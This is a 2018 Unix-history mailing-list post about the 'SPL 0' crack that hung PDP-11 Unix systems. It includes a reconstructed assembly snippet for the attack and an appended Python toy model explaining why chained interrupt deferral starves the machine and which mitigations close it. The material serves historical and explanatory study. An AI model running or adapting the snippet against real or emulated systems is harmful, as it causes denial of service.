* [TUHS] That "SPL 0" instruction...
@ 2018-04-09 6:18 Dave Horsfall
From: Dave Horsfall @ 2018-04-09 6:18 UTC (permalink / raw)
A nerdy group on an Aussie list is discussing old Unix cracks, and the
infamous "SPL 0" brick-that-box came up. I first saw it in ";login:" (I
think), and, err, tried it (as did others)...
Can anyone reproduce the code? It went something like:
> [ SPL 0 ]
>
> I only did that once (and you should've heard what he said to me)...
> I'm still trying to find the source for it (it was published in a
> ";login:" journal) to see if SIMH is vulnerable.
The concept was simple enough - fill your entire memory space with an uninterruptible instruction. It would have gone something like:

opc = 000230                    ; 000230 is the opcode for SPL 0

        sys     brk, -1         ; or whatever value got you all 64k of address space
        mov     #place, sp
        jmp     place

        . = opc - 2             ; the -2 is to allow for the PC increment on an instruction fetch, which I believe happens before any execution
place:
        jsr     pc, -(pc)
Ring any bells, anyone?
--
Dave Horsfall DTM (VK2KFU) "Those who don't understand security will suffer."
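A toy model of the failure mode the post describes, added here as an example; it is not code from the post, from ";login:", or from any Unix or SIMH source. It does not implement PDP-11 semantics. It assumes the mechanism usually given for this crack: an SPL-style instruction defers interrupt recognition until the next instruction boundary, so an unbroken stream of them never lets the clock interrupt in and the scheduler starves. A memory pre-filled with the SPL opcode stands in for what the post's `jsr pc, -(pc)` loop produces. The two switches `deferral_after_spl` and `user_mode_spl_traps` are hypothetical design knobs that show what closes the window (no deferral, or trapping the privileged instruction in user mode); they are not a description of what DEC or Unix actually did.

```python
from dataclasses import dataclass

# Opcode values from the post (SPL 0) and the PDP-11 NOP.  In this toy they are
# only distinguishable tokens in memory, not executed PDP-11 instructions.
SPL = 0o000230
NOP = 0o000240


@dataclass
class ToyCPU:
    """Minimal in-order CPU: one instruction per step, interrupts recognised
    only at instruction boundaries.  `inhibit` is the deferral window that an
    SPL opens for exactly one following instruction (assumed mechanism)."""
    mem: list
    deferral_after_spl: bool = True    # the quirk: SPL defers interrupt recognition
    user_mode_spl_traps: bool = False  # hypothetical mitigation: privileged op traps
    pc: int = 0
    inhibit: bool = False

    def step(self, interrupt_pending: bool) -> str:
        # Interrupt recognition happens here, unless the previous SPL inhibited it.
        if interrupt_pending and not self.inhibit:
            return "interrupt"
        self.inhibit = False
        op = self.mem[self.pc]
        self.pc = (self.pc + 1) % len(self.mem)   # wrap, like a full address space
        if op == SPL:
            if self.user_mode_spl_traps:
                return "trap"
            if self.deferral_after_spl:
                self.inhibit = True                # chain: next boundary is covered too
        return "exec"


def outcome(mem, interrupt_at=3, max_steps=500, **flags):
    """Run until the clock interrupt (pending from step `interrupt_at` on) is
    serviced, a trap fires, or the step budget runs out, which we read as the
    machine being starved.  Returns (status, step)."""
    cpu = ToyCPU(mem=list(mem), **flags)
    for step in range(max_steps):
        res = cpu.step(interrupt_pending=step >= interrupt_at)
        if res == "interrupt":
            return ("serviced", step)
        if res == "trap":
            return ("trapped", step)
    return ("starved", None)


def all_spl(words=32):
    """Constructed memory image: every word is the SPL opcode, which is what the
    post's self-pushing jsr loop leaves behind in the real address space."""
    return [SPL] * words


if __name__ == "__main__":
    print("all SPL, deferral quirk  :", outcome(all_spl()))
    broken = all_spl()
    broken[10] = NOP                      # one non-SPL word breaks the chain
    print("one NOP in the stream    :", outcome(broken))
    print("no deferral window       :", outcome(all_spl(), deferral_after_spl=False))
    print("user-mode SPL traps      :", outcome(all_spl(), user_mode_spl_traps=True))
```

The point the model makes is that the window is harmless on its own (one instruction) and only becomes a denial of service because it can be chained without a gap; either denying the deferral to unprivileged code or trapping the instruction outright removes the chain.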